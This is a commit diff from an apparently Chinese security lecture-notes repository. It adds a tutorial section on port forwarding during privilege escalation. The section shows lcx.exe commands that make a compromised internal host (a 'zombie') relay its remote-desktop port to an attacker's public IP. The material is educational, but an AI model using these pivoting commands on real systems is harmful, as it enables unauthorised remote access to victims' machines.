Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
OpenDocCN
mst-sec-lecture-notes
提交
76b9e0fe
M
mst-sec-lecture-notes
项目概览
OpenDocCN
/
mst-sec-lecture-notes
通知
0
Star
0
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
M
mst-sec-lecture-notes
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
76b9e0fe
编写于
12月 27, 2016
作者:
W
wizardforcel
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
lcx
上级
3caa84ea
变更
1
隐藏空白更改
内联
并排
Showing
1 changed file
with
44 addition
and
0 deletion
+44
-0
漏洞篇 提权.md
漏洞篇 提权.md
+44
-0
未找到文件。
漏洞篇 提权.md
浏览文件 @
76b9e0fe
...
...
@@ -78,3 +78,47 @@
![](
http://ww4.sinaimg.cn/large/841aea59jw1fb4cdsd6xgj20hq04174a.jpg
)
可以看到突破了限制。
## 端口转发
在提权过程中,我们经常碰到这样的情况:
![](
http://ww4.sinaimg.cn/large/841aea59jw1fb56mw6pk7j20d508mwew.jpg
)
我们可以看到 WebShell 的主机处于内网下,内网的意思就是说,它能连接别人,但别人不能连接它,就跟连接路由器的个人电脑差不多。
那么这种情况下,我们就需要用到端口转发工具
`lcx.exe`
,除此之外,还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡,独立 IP 主机叫做本机。
将
`lcx.exe`
上传至本机和肉鸡之后,首先确定本机的 IP 为
`119.90.140.191`
:
![](
http://ww3.sinaimg.cn/large/841aea59jw1fb56n00sppj208h020743.jpg
)
然后我们在本机执行:
```
lcx.exe -listen 51 3388
```
![](
http://ww1.sinaimg.cn/large/841aea59jw1fb56n2ux6ej20gt07kjrv.jpg
)
这条命令的意思就是说,监听本机的 51 和 3388 端口,并将两个端口互相转发,端口 51 的入境流量发给端口 3388,反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口,为了避免与本机的远程连接服务冲突,选择了 3388。大家可以自行选择其他未占用端口。
然后我们在肉鸡上执行:
```
lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389
```
![](
http://ww2.sinaimg.cn/large/841aea59jw1fb56n5zhs8j20lo026glh.jpg
)
这条命令连接肉鸡的 3389 端口,和本机的 51 端口,并互相转发。
之后,我们在本机或其他主机上使用远程连接客户端,连接
`119.90.140.191:3388`
,可以看到
`lcx`
中显示了转发的信息。
![](
http://ww1.sinaimg.cn/large/841aea59jw1fb56n8h5txj20gt0a10tg.jpg
)
远程连接客户端的封包会发给主机的
`lcx`
,之后会发给肉鸡的
`lcx`
,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。
等待一会儿之后,我们成功连接了肉鸡的远程桌面:
![](
http://ww1.sinaimg.cn/large/841aea59jw1fb56nbetaaj20j50cjgll.jpg
)
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录